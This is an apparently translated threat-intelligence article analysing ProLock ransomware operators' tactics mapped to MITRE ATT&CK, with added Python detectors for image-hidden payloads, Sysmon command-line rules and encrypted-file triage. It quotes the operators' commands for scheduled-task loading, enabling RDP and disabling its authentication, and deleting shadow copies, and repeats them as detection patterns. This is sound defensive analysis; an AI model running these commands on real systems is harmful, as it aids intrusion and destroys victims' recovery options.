Unmasking ProLock: an analysis of the new ransomware operators' actions using the MITRE ATT&CK matrix

The success of ransomware attacks on organizations around the world is encouraging more and more new attackers to enter the game. One of these new players is the group using the ProLock ransomware. It appeared in March 2020 as the successor of PwndLocker, which began operating at the end of 2019. ProLock ransomware attacks primarily target financial and healthcare organizations, government agencies, and the retail sector. Recently, ProLock operators successfully attacked one of the largest ATM manufacturers, Diebold Nixdorf.

In this post, Oleg Skulkin, lead specialist at the Computer Forensics Laboratory of Group-IB, covers the main tactics, techniques and procedures (TTPs) used by the ProLock operators. The article ends with a mapping to the MITRE ATT&CK Matrix, a public knowledge base that collects the attack tactics used by various cybercriminal groups.

Initial access

ProLock operators use two main vectors of initial compromise: the QakBot (Qbot) Trojan and unprotected RDP servers with weak passwords.

Compromise through an externally accessible RDP server is extremely popular in the ransomware landscape. Typically, attackers buy access to a compromised server from third parties, but group members can also obtain it on their own.

A more interesting initial compromise vector is the QakBot malware. Previously, this Trojan was associated with another ransomware family, MegaCortex. Now, however, it is used by ProLock operators.

QakBot is usually distributed through phishing campaigns. A phishing email may contain an attached Microsoft Office document or a link to a file hosted on a cloud storage service such as Microsoft OneDrive.

There are also known cases of QakBot being loaded by another Trojan, Emotet, which is well known for its participation in campaigns that distributed the Ryuk ransomware.

Execution

Once the infected document is downloaded and opened, the user is prompted to enable macros. If this succeeds, PowerShell is launched, which downloads and runs the QakBot payload from the command and control server.

It is important to note that the same applies to ProLock: the payload is extracted from a BMP or JPG file and loaded into memory using PowerShell. In some cases, a scheduled task is used to start PowerShell.

Batch script that launches ProLock through the task scheduler:

schtasks.exe /CREATE /XML C:\Programdata\WinMgr.xml /tn WinMgr
schtasks.exe /RUN /tn WinMgr
del C:\Programdata\WinMgr.xml
del C:\Programdata\run.bat

Persistence

If an RDP server could be compromised and access obtained, valid accounts are then used to gain access to the network. QakBot is notable for a variety of persistence mechanisms. Most often, this Trojan uses the Run registry key and creates tasks in the scheduler:

[Image: QakBot persistence in the system through the Run registry key]

In some cases, startup folders are also used: a shortcut pointing to the loader is placed there.

Defense evasion

By communicating with the command and control server, QakBot periodically attempts to update itself; to avoid detection, the malware can replace its current version with a new one. Executable files are signed with a compromised or forged signature. The initial payload loaded by PowerShell is stored on the C&C server with a PNG extension. In addition, after execution it is replaced with the legitimate calc.exe file.

Also, to hide malicious activity, QakBot uses the technique of injecting code into processes, using explorer.exe.

As already mentioned, the ProLock payload is hidden inside a BMP or JPG file. This can also be considered a defense evasion technique.
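The article notes twice that the loader hides the ProLock binary inside an image file (BMP or JPG here, PNG or JPG in the deployment section) and that QakBot's first stage is served with a PNG extension. A carrier like that normally keeps a valid image header, so the file is longer than its own format says it should be. The following is an added example, not code from the article or from Group-IB, that checks a BMP, JPEG or PNG for bytes after the point where the format ends (declared bfSize for BMP, the real EOI marker for JPEG, the IEND chunk for PNG). The three sample images and the appended bytes are constructed in the code; they are not real malware samples.

```python
import struct
import zlib

# Added example: report how many bytes follow the end of the image as the
# format itself defines it. A payload appended to an otherwise valid image
# shows up as a non-zero trailer; a clean image yields 0.

def bmp_trailer(data):
    """Bytes after the file size declared in the BMP file header (bfSize, offset 2)."""
    if len(data) < 14 or data[:2] != b"BM":
        raise ValueError("not a BMP file")
    declared = struct.unpack_from("<I", data, 2)[0]
    return max(0, len(data) - declared)

# In entropy-coded JPEG data 0xFF is always followed by 0x00 (byte stuffing)
# or an RSTn marker (0xD0-0xD7); any other 0xFF xx pair is a real marker.
_JPEG_STUFFED = {0x00} | set(range(0xD0, 0xD8))

def jpeg_trailer(data):
    """Bytes after the EOI marker, located by walking the marker segments
    (so an EOI inside an embedded EXIF thumbnail is not mistaken for the end)."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG file")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xD9:                            # EOI
            return len(data) - (pos + 2)
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # stand-alone markers, no length
            pos += 2
            continue
        if pos + 4 > len(data):
            break
        seglen = struct.unpack_from(">H", data, pos + 2)[0]
        pos += 2 + seglen
        if marker == 0xDA:                            # SOS: skip entropy-coded data
            while pos + 1 < len(data) and not (
                data[pos] == 0xFF and data[pos + 1] not in _JPEG_STUFFED
            ):
                pos += 1
    raise ValueError("truncated JPEG: no EOI marker")

def png_trailer(data):
    """Bytes after the IEND chunk (chunk = 4-byte length, 4-byte type, data, 4-byte CRC)."""
    if data[:8] != b"\x89PNG\r\n\x1a\n":
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 8 <= len(data):
        length = struct.unpack_from(">I", data, pos)[0]
        ctype = data[pos + 4:pos + 8]
        pos += 12 + length
        if ctype == b"IEND":
            return len(data) - pos
    raise ValueError("truncated PNG: no IEND chunk")

_PROBES = ((b"BM", "BMP", bmp_trailer), (b"\xff\xd8", "JPEG", jpeg_trailer),
           (b"\x89PNG", "PNG", png_trailer))

def scan_image(data):
    """Return (format, trailing_bytes). A trailer larger than 0 deserves a closer look."""
    for magic, fmt, probe in _PROBES:
        if data.startswith(magic):
            return fmt, probe(data)
    return "unknown", 0

# ---- constructed samples (minimal valid images; PAYLOAD stands in for appended data) ----
PAYLOAD = b"MZ" + b"\x00" * 30

def _png_chunk(ctype, payload):
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def sample_bmp(extra=b""):
    pixels = b"\x00\x00\xff\x00"                   # one pixel, row padded to 4 bytes
    core = struct.pack("<IHHHH", 12, 1, 1, 1, 24)  # BITMAPCOREHEADER: 1x1, 24 bpp
    size = 14 + len(core) + len(pixels)
    return b"BM" + struct.pack("<IHHI", size, 0, 0, 14 + len(core)) + core + pixels + extra

def sample_jpeg(extra=b""):
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\x34\xff\x00\x56"                 # entropy data with one stuffed 0xFF
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9" + extra

def sample_png(extra=b""):
    ihdr = _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
    idat = _png_chunk(b"IDAT", zlib.compress(b"\x00\x00\x00\xff"))
    return b"\x89PNG\r\n\x1a\n" + ihdr + idat + _png_chunk(b"IEND", b"") + extra

if __name__ == "__main__":
    for name, make in (("bmp", sample_bmp), ("jpeg", sample_jpeg), ("png", sample_png)):
        print(name, "clean:", scan_image(make()), "appended:", scan_image(make(PAYLOAD)))
```

A non-zero trailer is a triage signal, not proof: some legitimate writers append metadata, and a loader could also hide data inside a valid chunk or segment instead of after it. The check is cheap enough to run over every image written to ProgramData or a user profile around the time PowerShell was observed reading it.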

Credential access

QakBot has keylogger functionality. In addition, it can download and run additional scripts, for example Invoke-Mimikatz, a PowerShell version of the well-known Mimikatz utility. Attackers can use such scripts to dump credentials.

Discovery

Having gained access to privileged accounts, the ProLock operators perform network reconnaissance, which may include port scanning and analysis of the Active Directory environment. In addition to various scripts, the attackers use AdFind, another tool popular among ransomware groups, to collect information about Active Directory.

Lateral movement

Traditionally, one of the most popular methods of lateral movement is Remote Desktop Protocol, and ProLock is no exception. The attackers' arsenal includes scripts for obtaining remote access to target hosts over RDP.

BAT script for gaining access over the RDP protocol:

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f

For remote script execution, ProLock operators use another popular tool, the PsExec utility from the Sysinternals Suite.

ProLock is launched on hosts using WMIC, a command-line interface for working with the Windows Management Instrumentation subsystem. This tool is also becoming increasingly popular among ransomware operators.

Collection

Like many other ransomware operators, the group using ProLock collects data from the compromised network to increase its chances of receiving a ransom. Before exfiltration, the collected data is archived using the 7Zip utility.

Exfiltration

To exfiltrate data, ProLock operators use Rclone, a command-line tool designed to synchronize files with various cloud storage services such as OneDrive, Google Drive, Mega and others. The attackers often rename the executable so that it looks like a legitimate system file.

Unlike their peers, ProLock operators still do not have their own website for publishing data stolen from companies that refused to pay the ransom.

Achieving the final goal

Once the data has been exfiltrated, the team deploys ProLock across the enterprise network. The binary is extracted from a file with a PNG or JPG extension using PowerShell and injected into memory.

First of all, ProLock terminates the processes in its built-in list (curiously, it compares only the first six characters of the process name, for example "winwor") and stops services, including security-related ones such as CSFalconService (CrowdStrike Falcon), using the net command.

Then, like many other ransomware families, the attackers use vssadmin to delete Windows shadow copies and limit their storage size so that no new copies are created:

vssadmin.exe delete shadows /all /quiet
vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unbounded
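Almost every step described above, from the scheduled task created from an XML in ProgramData, through the registry and firewall changes that open RDP, to the renamed Rclone binary, WMIC execution, the stopped security service and the vssadmin commands, leaves a process-creation record with a recognisable command line. The following is an added example, not code from the article or from Group-IB, that runs a small rule set over Sysmon-style process-creation records (fields Image, CommandLine and OriginalFileName, as Sysmon Event ID 1 reports them) and tags each hit with the technique ID from the article's ATT&CK table. The Rclone rule deliberately matches on OriginalFileName, the name compiled into the PE, because the article says the operators rename the file. All event records below are constructed for the demonstration; host names and paths in them are placeholders.

```python
import re

# Added example: command-line detection rules for the ProLock operator
# activity described in the article, applied to constructed Sysmon-like events.

def _basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1]

def ev(image, cmdline, original=None):
    """Constructed record shaped like Sysmon Event ID 1 (process creation)."""
    return {"Image": image, "CommandLine": cmdline,
            "OriginalFileName": original if original is not None else _basename(image)}

# (rule name, technique ID from the article's mapping table, field to inspect, regex)
RULES = [
    ("Scheduled task created from XML outside the Windows directory", "T1053", "CommandLine",
     r"schtasks(\.exe)?\s+/create\b.*?/xml\s+\S*(programdata|\\temp\\|appdata)"),
    ("RDP connections enabled via registry (fDenyTSConnections=0)", "T1076", "CommandLine",
     r"reg(\.exe)?\s+add\b.*terminal server.*fdenytsconnections.*/d\s+0\b"),
    ("RDP Network Level Authentication disabled (UserAuthentication=0)", "T1076", "CommandLine",
     r"reg(\.exe)?\s+add\b.*rdp-tcp.*userauthentication.*/d\s+0\b"),
    ("Firewall rule group 'Remote Desktop' enabled", "T1076", "CommandLine",
     r'netsh\s+advfirewall\s+firewall\s+set\s+rule\s+group="remote desktop".*enable=yes'),
    ("Volume shadow copies deleted", "T1490", "CommandLine",
     r"vssadmin(\.exe)?\s+delete\s+shadows"),
    ("Shadow storage resized", "T1490", "CommandLine",
     r"vssadmin(\.exe)?\s+resize\s+shadowstorage\b.*/maxsize="),
    ("WMIC process creation", "T1047", "CommandLine",
     r"wmic(\.exe)?\b.*process\s+call\s+create"),
    ("Security service stopped via net", "T1089", "CommandLine",
     r"net1?(\.exe)?\s+stop\s+\"?csfalconservice"),
    ("Rclone executed (matched on PE original name, survives renaming)", "T1537", "OriginalFileName",
     r"^rclone\.exe$"),
]
_COMPILED = [(n, t, f, re.compile(rx, re.IGNORECASE | re.DOTALL)) for n, t, f, rx in RULES]

def match_event(event):
    """Return [(rule name, technique), ...] for one event."""
    hits = [(name, tech) for name, tech, field, rx in _COMPILED if rx.search(event.get(field, ""))]
    # Renamed binary: the name compiled into the PE differs from the file name on disk.
    orig = event.get("OriginalFileName", "")
    if orig and orig.lower() != _basename(event["Image"]).lower():
        hits.append(("Executable renamed (OriginalFileName differs from Image)", "T1036"))
    return hits

def scan(events):
    return [{"event": i, "rule": n, "technique": t}
            for i, e in enumerate(events) for n, t in match_event(e)]

# Constructed events; the first nine mirror the article's commands, the last two are benign.
EVENTS = [
    ev(r"C:\Windows\System32\schtasks.exe", r"schtasks.exe /CREATE /XML C:\Programdata\WinMgr.xml /tn WinMgr"),
    ev(r"C:\Windows\System32\reg.exe", r'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f'),
    ev(r"C:\Windows\System32\reg.exe", r'reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f'),
    ev(r"C:\Windows\System32\netsh.exe", r'netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes'),
    ev(r"C:\Windows\System32\vssadmin.exe", r"vssadmin.exe delete shadows /all /quiet"),
    ev(r"C:\Windows\System32\vssadmin.exe", r"vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB"),
    ev(r"C:\ProgramData\svchost.exe", r"svchost.exe copy C:\ProgramData\out remote:backup", original="rclone.exe"),
    ev(r"C:\Windows\System32\wbem\WMIC.exe", r'wmic /node:"HOST01" process call create "cmd /c C:\ProgramData\run.bat"'),
    ev(r"C:\Windows\System32\net.exe", r"net stop CSFalconService"),
    ev(r"C:\Windows\System32\vssadmin.exe", r"vssadmin.exe list shadows"),
    ev(r"C:\Windows\System32\schtasks.exe", r'schtasks /Query /tn "\Microsoft\Windows\Defrag\ScheduledDefrag"'),
]

if __name__ == "__main__":
    for hit in scan(EVENTS):
        print("event %(event)d  %(technique)s  %(rule)s" % hit)
```

The regexes are written against raw command lines, so the same rules apply whether the source is Sysmon, EDR telemetry or Windows Security event 4688 with command-line auditing enabled. The shadow-copy and RDP rules are the highest-fidelity ones; the schtasks rule will need an allow-list for software installers that legitimately register tasks from ProgramData.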

ProLock appends the extension .proLock, .pr0Loka or .proL0ck to each encrypted file and places the file [HOW TO RECOVER FILES].TXT in every folder. This file contains instructions on how to decrypt the files, including a link to a site where the victim must enter a unique ID and receive payment information.

Each ProLock sample contains information about the ransom amount; in this case it is 35 bitcoins, approximately $312.
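The two artefacts the article names for the encryption stage, the appended extensions and the ransom note dropped into every folder, are what an incident responder uses to scope the damage on a share or host image. The following is an added example, not code from the article or from Group-IB, that walks a directory tree, counts encrypted files per extension, lists the ransom notes and affected directories, and bounds the encryption window from file modification times. The sample tree it builds is constructed in a temporary directory; the names and timestamps are invented for the demonstration.

```python
import os
import tempfile

# Added example: scope a ProLock incident on a file tree using the extensions
# and the ransom note name given in the article.
PROLOCK_EXTENSIONS = {".prolock", ".pr0loka", ".prol0ck"}
RANSOM_NOTE = "[HOW TO RECOVER FILES].TXT"

def triage_tree(root):
    """Count encrypted files per extension, collect ransom notes and affected
    directories, and bound the encryption window by modification times."""
    result = {"encrypted": 0, "by_extension": {}, "notes": [],
              "affected_dirs": set(), "first_mtime": None, "last_mtime": None}
    for dirpath, _subdirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() == RANSOM_NOTE.lower():
                result["notes"].append(path)
                continue
            ext = os.path.splitext(name)[1].lower()   # case-insensitive: .proLock, .pr0Loka, .proL0ck
            if ext not in PROLOCK_EXTENSIONS:
                continue
            result["encrypted"] += 1
            result["by_extension"][ext] = result["by_extension"].get(ext, 0) + 1
            result["affected_dirs"].add(dirpath)
            mtime = os.path.getmtime(path)
            if result["first_mtime"] is None or mtime < result["first_mtime"]:
                result["first_mtime"] = mtime
            if result["last_mtime"] is None or mtime > result["last_mtime"]:
                result["last_mtime"] = mtime
    result["affected_dirs"] = sorted(result["affected_dirs"])
    result["notes"].sort()
    return result

# Constructed sample layout: (relative path, mtime as epoch seconds or None to leave as created)
SAMPLE_FILES = [
    ("docs/quarterly.xlsx.proLock", 1590000000),
    ("docs/[HOW TO RECOVER FILES].TXT", 1590000005),
    ("docs/notes.txt", None),                      # untouched file
    ("db/backup.bak.pr0Loka", 1590000600),
    ("db/[HOW TO RECOVER FILES].TXT", 1590000605),
    ("pictures/holiday.jpg", None),                # untouched file
]

def build_sample_tree():
    """Create the constructed tree in a temp directory and return its root."""
    root = tempfile.mkdtemp(prefix="prolock_triage_")
    for rel, mtime in SAMPLE_FILES:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(b"constructed sample content")
        if mtime is not None:
            os.utime(path, (mtime, mtime))
    return root

if __name__ == "__main__":
    summary = triage_tree(build_sample_tree())
    print("encrypted files:", summary["encrypted"], summary["by_extension"])
    print("ransom notes:", len(summary["notes"]))
    print("affected directories:", summary["affected_dirs"])
    if summary["first_mtime"] is not None:
        print("encryption window (s):", summary["last_mtime"] - summary["first_mtime"])
```

Run it against a mounted forensic image or a read-only share mapping rather than the live victim host, so the walk does not disturb timestamps that have not yet been preserved. The first and last modification times give a rough window for correlating with the PowerShell and vssadmin events from the earlier stages.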

Conclusions

Many ransomware operators use similar methods to achieve their goals. At the same time, some techniques are unique to each group. The number of cybercriminal groups using ransomware in their campaigns is currently growing. In some cases, the same operators may be involved in attacks using different ransomware families, so we will see more and more overlap in the tactics, techniques and procedures used.

Mapping to the MITRE ATT&CK Matrix

Tactic: Techniques

Initial Access (TA0001): External Remote Services (T1133), Spearphishing Attachment (T1193), Spearphishing Link (T1192)

Execution (TA0002): PowerShell (T1086), Scripting (T1064), User Execution (T1204), Windows Management Instrumentation (T1047)

Persistence (TA0003): Registry Run Keys / Startup Folder (T1060), Scheduled Task (T1053), Valid Accounts (T1078)

Defense Evasion (TA0005): Code Signing (T1116), Deobfuscate/Decode Files or Information (T1140), Disabling Security Tools (T1089), File Deletion (T1107), Masquerading (T1036), Process Injection (T1055)

Credential Access (TA0006): Credential Dumping (T1003), Brute Force (T1110), Input Capture (T1056)

Discovery (TA0007): Account Discovery (T1087), Domain Trust Discovery (T1482), File and Directory Discovery (T1083), Network Service Scanning (T1046), Network Share Discovery (T1135), Remote System Discovery (T1018)

Lateral Movement (TA0008): Remote Desktop Protocol (T1076), Remote File Copy (T1105), Windows Admin Shares (T1077)

Collection (TA0009): Data from Local System (T1005), Data from Network Shared Drive (T1039), Data Staged (T1074)

Command and Control (TA0011): Commonly Used Port (T1043), Web Service (T1102)

Exfiltration (TA0010): Data Compressed (T1002), Transfer Data to Cloud Account (T1537)

Impact (TA0040): Data Encrypted for Impact (T1486), Inhibit System Recovery (T1490)

Source: www.habr.com
